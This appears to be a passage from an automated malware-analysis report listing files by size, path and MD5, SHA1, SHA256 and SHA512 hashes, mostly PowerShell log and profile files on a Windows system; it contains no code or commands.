  MD5: e858e636547aa1dff328554f5750cb37
  SHA1: a96483d7314414755ae9f89e389843ae35d3fece
  SHA256: 7a33f13cab7536657d3e8c34d5d59b6f4eec7b479f1e852fe675b518e4138222
  SHA512: 4f95096a29614c6c3b9096fc75ea24aca2e92d619888094a942832d637df9dd55ae1eaa98df37cf3c3d57ad5d633267d019a29cf8f165f09ec4f647981656c30
- Filesize: 4.1MB (4 identical entries)
  MD5: 451af59f1dc7bf09eaad8c27aab0a8fe
  SHA1: a1e5d215d9e45937697d72e14d33476c6af4705c
  SHA256: 2273ad3c5739e3c75de32a37f690ccce141a76524c20cd773e267b6b93731606
  SHA512: 39b70ffa5e0b56fc6b550d0d16d00aec809f366a5dc1027b418e3198ae86a950d07721ed749776f6b3d9ce5eeea3b24895bd58aee66daa2ba8a5b5176bf6d41d
- Filesize: 198KB (6 identical entries)
  MD5: a64a886a695ed5fb9273e73241fec2f7
  SHA1: 363244ca05027c5beb938562df5b525a2428b405
  SHA256: 563acabe49cc451e9caac20fae780bad27ea09aaefaaf8a1dfd838a00de97144
  SHA512: 122779ad7bce927e1b881df181fcc3181080d3929a67f750358fa446a21397b998d167c03aed5f3bdc3cd7a1f17e4da095f9b4a9367c6357cabefcf8cdd29474
- Filesize: 60B
  MD5: d17fe0a3f47be24a6453e9ef58c94641
  SHA1: 6ab83620379fc69f80c0242105ddffd7d98d5d9d
  SHA256: 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
  SHA512: 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
- Filesize: 281KB (2 identical entries)
  MD5: d98e33b66343e7c96158444127a117f6
  SHA1: bb716c5509a2bf345c6c1152f6e3e1452d39d50d
  SHA256: 5de4e2b07a26102fe527606ce5da1d5a4b938967c9d380a3c5fe86e2e34aaaf1
  SHA512: 705275e4a1ba8205eb799a8cf1737bc8ba686925e52c9198a6060a7abeee65552a85b814ac494a4b975d496a63be285f19a6265550585f2fc85824c42d7efab5
- C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
  Filesize: 2KB
  MD5: 968cb9309758126772781b83adb8a28f
  SHA1: 8da30e71accf186b2ba11da1797cf67f8f78b47c
  SHA256: 92099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a
  SHA512: 4bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3
- C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
  Filesize: 19KB
  MD5: 1ff57801793d3fb22f74fde36f597358
  SHA1: 4508757a4119e742af662e8590060048d5a3a272
  SHA256: f87642f786a8feac8afc599c52dd6629fea175401d1ac2130b9cc407730756be
  SHA512: 9e98bc7a48fba834442d20df17008d9b033a5dcf2b8e61ecbf85c3fed1eb258401074c62ec4c341b003241114f9516bba2dc5b6d7dc8c70718f747fa430d5be9
- C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
  Filesize: 19KB
  MD5: 719b3aaabad247c7e3e168302642b20a
  SHA1: 503d0a10e62a42195dca3d1e31daf3b6a579dd82
  SHA256: 36299615fbb6ecae16b918cd91b3b6c20370811a7fa3f4dfb7468cc6148a5028
  SHA512: e7d8de2bf0033a076f86018eabcf88e922693cf0be4bf90973e079a9ed0b3cfaa548279168170fae494baadb60f22d5a4d657680af0368f97e1729c9077e4bad
- C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
  Filesize: 19KB
  MD5: b868d3f1ad475fe3e603d18c105f20a3
  SHA1: 5c39dd27afd0e3d7012c7345290728381a36a025
  SHA256: aa5e2f5b06b2e4dea8449e92b37ff1c975c8646e6d40725c078bd7cc838134ee
  SHA512: 4123a31b8136278aa1289a829663badfbf011cbf788d941f8ac99dc4144272292b280cba428536b4f8247a4042c666e36fbf8114356273d4d8415c30b1c345b6
- C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
  Filesize: 19KB
  MD5: 8046699a5948cf72713efbf617937062
  SHA1: 43c8a3fbf1072397acfa1b91d650267386e5e0ec
  SHA256: c75f1f7aae2b393cbeeaffd02cdb4647ff2e15c79f4b141e920d5e6b2ccb0b7a
  SHA512: ffd6a72189c78b1765774a59623233db66daaeff8ba17f727b1435232395790d13b34723ca0cdc6d4162c0949d159cda2e1b397057aa7bdde7a76009bfddca74
- C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
  Filesize: 19KB
  MD5: 20bcfd66dbd06138f4dcfc776e8d2105
  SHA1: 062c5d034fa1ad72b55c7854ba51fb3497548856
  SHA256: 9d16786b5e61bd3341b686b15fb9ba35a1646d62e9c23768b3446ce58f9a5e03
  SHA512: 487c2f6d3d4e105b96001ed1ecd3da2fff44e3356e078d1af4d261956b1fa4368bded645729810dfed3b7047aced1a069836a440b98071b2954aef0563fe9658
- Filesize: 3KB (3 identical entries)
  MD5: 00930b40cba79465b7a38ed0449d1449
  SHA1: 4b25a89ee28b20ba162f23772ddaf017669092a5
  SHA256: eda1aae2c8fce700e3bdbe0186cf3db88400cf0ac13ec736e84dacba61628a01
  SHA512: cbe4760ec041e7da7ab86474d5c82969cfccb8ccc5dbdac9436862d5b1b86210ab90754d3c8da5724176570d8842e57a716a281acba8719e90098a6f61a17c62
- Filesize: 4.1MB (2 identical entries)
  MD5: 451af59f1dc7bf09eaad8c27aab0a8fe
  SHA1: a1e5d215d9e45937697d72e14d33476c6af4705c
  SHA256: 2273ad3c5739e3c75de32a37f690ccce141a76524c20cd773e267b6b93731606
  SHA512: 39b70ffa5e0b56fc6b550d0d16d00aec809f366a5dc1027b418e3198ae86a950d07721ed749776f6b3d9ce5eeea3b24895bd58aee66daa2ba8a5b5176bf6d41d
- C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
  Filesize: 4KB
  MD5: bdb25c22d14ec917e30faf353826c5de
  SHA1: 6c2feb9cea9237bc28842ebf2fea68b3bd7ad190
  SHA256: e3274ce8296f2cd20e3189576fbadbfa0f1817cdf313487945c80e968589a495
  SHA512: b5eddbfd4748298a302e2963cfd12d849130b6dcb8f0f85a2a623caed0ff9bd88f4ec726f646dbebfca4964adc35f882ec205113920cb546cc08193739d6728c
- C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
  Filesize: 1KB
  MD5: b42c70c1dbf0d1d477ec86902db9e986
  SHA1: 1d1c0a670748b3d10bee8272e5d67a4fabefd31f
  SHA256: 8ed3b348989cdc967d1fc0e887b2a2f5a656680d8d14ebd3cb71a10c2f55867a
  SHA512: 57fb278a8b2e83d01fac2a031c90e0e2bd5e4c1a360cfa4308490eb07e1b9d265b1f28399d0f10b141a6438ba92dd5f9ce4f18530ec277fece0eb7678041cbc5
- Filesize: 2.0MB (3 identical entries)
  MD5: 8e67f58837092385dcf01e8a2b4f5783
  SHA1: 012c49cfd8c5d06795a6f67ea2baf2a082cf8625
  SHA256: 166ddb03ff3c89bd4525ac390067e180fdd08f10fbcf4aadb0189541673c03fa
  SHA512: 40d8ae12663fc1851e171d9d86cea8bb12487b734c218d7b6f9742eb07d4ca265065cbd6d0bb908f8bda7e3d955c458dfe3fd13265bbf573b9351e0a2bf691ec